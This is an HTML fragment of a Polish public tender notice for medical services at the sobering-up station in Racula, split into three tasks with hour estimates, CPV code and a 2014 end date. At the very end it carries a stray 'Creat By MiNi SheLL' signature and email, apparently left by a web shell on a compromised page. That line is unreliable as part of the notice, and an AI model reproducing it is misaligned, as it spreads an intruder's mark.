<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi z podziałem na zadania - liczba zadań 3.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> CZĘŚĆ Nr 1 NAZWA:  świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi
1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:	
Świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi - zadanie 1.
Przewidywana ilość godzin usług medycznych wynosi:
-   w dni robocze  640 godzin;
-   w soboty, niedziele, pozostałe dni świąteczne 228 godzin;
-   w wybrane  dni świąteczne 12 godzin tj.  - Wielkanoc - 1 dzień (12 godz.), 
2)  Wspólny Słownik Zamówień (CPV): 85.12.10.00-3 
3)  Czas trwania lub termin wykonania: zakończenie: 31.12.2014 rok
4)  Kryteria oceny ofert: najniższa cena   

        CZĘŚĆ Nr 2 NAZWA:  świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi
        1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:	
         Świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi - zadanie 2.
Przewidywana ilość godzin usług medycznych wynosi:
-    w dni robocze - 480 godzin; 
-    w soboty, niedziele i święta - 228 godzin; 
-    w wybrane dni świąteczne  - 24 godziny tj. Wielkanoc - 1 dzień (12 godz.) i 25 grudnia - Boże Narodzenie -1 dzień  (12 godz.)  
         2)  Wspólny Słownik Zamówień (CPV): 85.12.10.00-3 
         3)  Czas trwania lub termin wykonania: zakończenie: 31.12.2014 rok
         4)  Kryteria oceny ofert: najniższa cena   

 CZĘŚĆ Nr 3 NAZWA:  świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi
  1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:	
  Świadczenie usług medycznych dla Izby Wytrzeźwień w Raculi - zadanie 3.
Przewidywana ilość godzin usług medycznych wynosi:
-     w dni robocze -  320 godzin; 
-     w soboty, niedziele, pozostałe święta - 230 godzin;
-    w wybrane dni świąteczne - Wielkanoc - 1 dzień (12 godz.), 
  2)  Wspólny Słownik Zamówień (CPV): 85.12.10.00-3 
  3)  Czas trwania lub termin wykonania: zakończenie: 31.12.2014 rok
  4)  Kryteria oceny ofert: najniższa cena.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com